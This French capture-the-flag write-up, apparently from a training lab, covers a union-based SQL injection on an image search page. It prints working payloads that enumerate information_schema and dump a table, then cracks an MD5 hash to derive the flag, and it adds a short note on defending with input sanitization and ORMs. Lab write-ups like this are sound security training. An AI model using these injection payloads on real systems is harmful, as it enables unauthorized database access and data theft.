- Flag : **f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188**
- **Quoi** : sur la page http://192.168.1.70/index.php?page=searchimg un champ nous laisse penser que nous pouvons récupérer des informations en entrant une valeur numérique (ID d’une image attendue)
- Comment se protéger : nettoyer les inputs provenant des utilisateurs et préparer les requêtes en avance dans le backend avec des [ORM](https://en.wikipedia.org/wiki/List_of_object%E2%80%93relational_mapping_software) comme Hibernate pour Java ou Doctrine pour PHP par exemple.
- Comment on a fait :
    - Même procédé que pour la page de membres. D’ailleurs nous retrouvons les mêmes données, il faut simplement qu’on regarde une autre table.
    - Si on entre 5 on peut voir :
        
        ```
        ID: 5
        Title: Hack me ?
        Url : borntosec.ddns.net/images.png
        ```
        
    - list_images semble pas mal :
        
        ```sql
        ID: 1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns; 
        Title: **id**
        Url : list_images
        ID: 1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns; 
        Title: **url**
        Url : list_images
        ID: 1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns; 
        Title: **title**
        Url : list_images
        ID: 1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns; 
        Title: **comment**
        Url : list_images
        ```
        
    - `1 AND 1=2 UNION SELECT id, CONCAT(url, title, comment) FROM list_images`
        
        ```sql
        ID: 1 AND 1=2 UNION SELECT id, CONCAT(url, title, comment) FROM list_images 
        Title: https://fr.wikipedia.org/wiki/Programme_NsaAn image about the NSA !
        Url : 1
        ID: 1 AND 1=2 UNION SELECT id, CONCAT(url, title, comment) FROM list_images 
        Title: https://fr.wikipedia.org/wiki/Fichier:4242 !There is a number..
        Url : 2
        ID: 1 AND 1=2 UNION SELECT id, CONCAT(url, title, comment) FROM list_images 
        Title: https://fr.wikipedia.org/wiki/Logo_de_GoGoogleGoogle it !
        Url : 3
        ID: 1 AND 1=2 UNION SELECT id, CONCAT(url, title, comment) FROM list_images 
        Title: https://en.wikipedia.org/wiki/Earth#/medEarthEarth!
        Url : 4
        ID: 1 AND 1=2 UNION SELECT id, CONCAT(url, title, comment) FROM list_images 
        Title: borntosec.ddns.net/images.pngHack me ?If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46
        Url : 5
        ```
        
        Decode 1928e8083cf461a51303633093573c46 with MD5 : albatroz
        
        albatroz to sha256 : f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
